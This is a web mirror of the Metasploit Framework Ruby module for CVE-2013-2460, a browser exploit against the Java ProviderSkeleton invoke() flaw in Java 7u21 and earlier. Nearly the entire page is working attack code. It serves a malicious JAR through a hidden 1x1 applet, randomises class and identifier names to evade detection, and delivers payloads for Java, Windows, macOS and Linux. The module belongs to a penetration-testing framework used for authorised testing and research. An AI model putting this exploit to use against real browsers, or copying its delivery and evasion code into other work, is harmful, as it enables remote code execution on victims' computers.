CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/browser/java_jre17_provider_skeleton.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking # Because there isn't click2play bypass, plus now Java Security Level High by default

8


9
  include Msf::Exploit::Remote::HttpServer::HTML

10
  include Msf::Exploit::EXE

11


12
  include Msf::Exploit::Remote::BrowserAutopwn

13
  autopwn_info({ :javascript => false })

14


15
  EXPLOIT_STRING = "Exploit"

16


17
  def initialize( info = {} )

18


19
    super( update_info( info,

20
      'Name'          => 'Java Applet ProviderSkeleton Insecure Invoke Method',

21
      'Description'   => %q{

22
          This module abuses the insecure invoke() method of the ProviderSkeleton class that

23
        allows to call arbitrary static methods with user supplied arguments. The vulnerability

24
        affects Java version 7u21 and earlier.

25
      },

26
      'License'       => MSF_LICENSE,

27
      'Author'        =>

28
        [

29
          'Adam Gowdiak', # Vulnerability discovery according to Oracle's advisory and also POC

30
          'Matthias Kaiser' # Metasploit module

31
        ],

32
      'References'    =>

33
        [

34
          [ 'CVE', '2013-2460' ],

35
          [ 'OSVDB', '94346' ],

36
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpujun2013-1899847.html'],

37
          [ 'URL', 'http://hg.openjdk.java.net/jdk7u/jdk7u/jdk/rev/160cde99bb1a' ],

38
          [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-12.pdf' ],

39
          [ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-61.zip' ]

40
        ],

41
      'Platform'      => %w{ java linux osx win },

42
      'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },

43
      'Targets'       =>

44
        [

45
          [ 'Generic (Java Payload)',

46
            {

47
              'Platform' => ['java'],

48
              'Arch' => ARCH_JAVA,

49
            }

50
          ],

51
          [ 'Windows x86 (Native Payload)',

52
            {

53
              'Platform' => 'win',

54
              'Arch' => ARCH_X86,

55
            }

56
          ],

57
          [ 'Mac OS X x86 (Native Payload)',

58
            {

59
              'Platform' => 'osx',

60
              'Arch' => ARCH_X86,

61
            }

62
          ],

63
          [ 'Linux x86 (Native Payload)',

64
            {

65
              'Platform' => 'linux',

66
              'Arch' => ARCH_X86,

67
            }

68
          ],

69
        ],

70
      'DefaultTarget'  => 0,

71
      'DisclosureDate' => '2013-06-18'

72
    ))

73
  end

74


75
  def randomize_identifier_in_jar(jar, identifier)

76
    identifier_str = rand_text_alpha(identifier.length)

77
    jar.entries.each { |entry|

78
      entry.name.gsub!(identifier, identifier_str)

79
      entry.data = entry.data.gsub(identifier, identifier_str)

80
    }

81
  end

82


83


84
  def setup

85
    path = File.join(Msf::Config.data_directory, "exploits", "cve-2013-2460", "Exploit.class")

86
    @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

87
    path = File.join(Msf::Config.data_directory, "exploits", "cve-2013-2460", "ExpProvider.class")

88
    @provider_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

89
    path = File.join(Msf::Config.data_directory, "exploits", "cve-2013-2460", "DisableSecurityManagerAction.class")

90
    @action_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

91


92
    @exploit_class_name = rand_text_alpha(EXPLOIT_STRING.length)

93
    @exploit_class.gsub!(EXPLOIT_STRING, @exploit_class_name)

94


95
    super

96
  end

97


98
  def on_request_uri(cli, request)

99
    print_status("handling request for #{request.uri}")

100


101
    case request.uri

102
    when /\.jar$/i

103
      jar = payload.encoded_jar

104
      jar.add_file("#{@exploit_class_name}.class", @exploit_class)

105
      jar.add_file("ExpProvider.class", @provider_class)

106
      jar.add_file("DisableSecurityManagerAction.class", @action_class)

107
      randomize_identifier_in_jar(jar, "metasploit")

108
      randomize_identifier_in_jar(jar, "payload")

109
      jar.build_manifest

110


111
      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })

112
    when /\/$/

113
      payload = regenerate_payload(cli)

114
      if not payload

115
        print_error("Failed to generate the payload.")

116
        send_not_found(cli)

117
        return

118
      end

119
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })

120
    else

121
      send_redirect(cli, get_resource() + '/', '')

122
    end

123


124
  end

125


126
  def generate_html

127
    html = %Q|

128
    <html>

129
    <body>

130
    <applet archive="#{rand_text_alpha(rand(5) + 3)}.jar" code="#{@exploit_class_name}.class" width="1" height="1"></applet>

131
    </body>

132
    </html>

133
    |

134
    return html

135
  end

136
end

137


138